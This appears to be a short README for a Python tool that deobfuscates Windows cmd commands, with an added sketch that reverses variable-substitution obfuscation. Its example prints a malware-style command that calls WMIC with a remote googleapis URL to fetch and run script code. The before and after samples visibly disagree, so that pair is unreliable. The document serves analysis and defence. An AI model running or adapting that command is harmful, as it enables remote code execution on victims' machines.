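Python scripts
Usage is as follows. The file xxx.txt contains one obfuscated command per line.
When the run completes, a file named xxx.txt.clear is generated in the current
directory, holding the deobfuscated commands.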
python deDosfuscation.py xxx.txt
For example, before deobfuscation:
/V /C "set x=C77476dS66:\\77476dS66W77476dS66i77476dS66nd77476dS66ow77476dS66s\\s77476dS66ys77476dS66te77476dS66m377476dS66277476dS66\\77476dS66w77476dS66b77476dS66e77476dS66m\\W77476dS66M77476dS66I77476dS66C.e77476dS66x77476dS66e o77476dS66s g77476dS66e77476dS66t EF77476dS66Hn77476dS66xv77476dS66vhe77476dS66, las77476dS66t77476dS66b77476dS66o77476dS66o77476dS66t77476dS66u77476dS66pd77476dS66at77476dS66e /77476dS66fo77476dS66rm77476dS66at:"h77476dS66t77476dS66t77476dS66p77476dS66s77476dS66:77476dS66/77476dS66/st77476dS66or77476dS66ag77476dS66e.g77476dS66oog77476dS66l77476dS66e77476dS66a77476dS66p77476dS66i77476dS66s77476dS66.c77476dS66om77476dS66/a77476dS66wsd77476dS66x/077476dS66977476dS66/77476dS66v.77476dS66tx77476dS66t#77476dS660277476dS6650277476dS666k077476dS66W77476dS66I77476dS66J77476dS66b77476dS66z77476dS66477476dS66r" &&echo %x:77476dS66=%|%ComSpec%"
After deobfuscation:
/V /C "echo C:\\Windows\\system32\\wbem\\WMIC.exe os get t98dIFHrm, et8dWYH, numberofprocesses /format:https://storage.googleapis.com/ultramaker/08/v.txt#025015ed58iq24h|%ComSpec%"
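
The obfuscated sample above uses cmd.exe string substitution: a junk token is scattered through a variable's value and stripped again with %x:token=%. The sketch below is an added example, not the code of deDosfuscation.py; it resolves only this one pattern, and the name resolve_substitutions and the sample line are constructed for illustration.

```python
import re

# "set NAME=VALUE &&": cmd.exe ends the value at the command separator
# (simplification: a literal "&&" inside the value is not handled).
SET_RE = re.compile(r'\bset\s+([A-Za-z_]\w*)=(.*?)&&\s*', re.I | re.S)
# %NAME:search=replace% or, with /V delayed expansion, !NAME:search=replace!
SUB_RE = re.compile(r'([%!])([A-Za-z_]\w*):([^=%!]+)=([^%!]*)\1')


def resolve_substitutions(line):
    """Resolve 'set' plus %var:junk=% replacement obfuscation in one command line."""
    variables = {}

    def remember(match):
        # cmd.exe variable names are case-insensitive
        variables[match.group(1).lower()] = match.group(2)
        return ""  # drop the set statement from the output

    stripped = SET_RE.sub(remember, line)

    def expand(match):
        name, search, repl = match.group(2).lower(), match.group(3), match.group(4)
        if name not in variables:
            return match.group(0)  # unknown variable: leave the reference untouched
        # cmd.exe matches the search string case-insensitively
        return re.sub(re.escape(search), lambda _: repl, variables[name], flags=re.I)

    return SUB_RE.sub(expand, stripped)


# Constructed sample (not from the page): junk token "ZZ9" scattered through the value.
SAMPLE = r'/V /C "set x=C:\WinZZ9dows\sysZZ9tem32\whoZZ9ami.exe /aZZ9ll &&echo %x:ZZ9=%|%ComSpec%"'

if __name__ == "__main__":
    print(resolve_substitutions(SAMPLE))
```

The trailing space before "|" in the result is kept on purpose, because cmd.exe includes the space before "&&" in the variable's value.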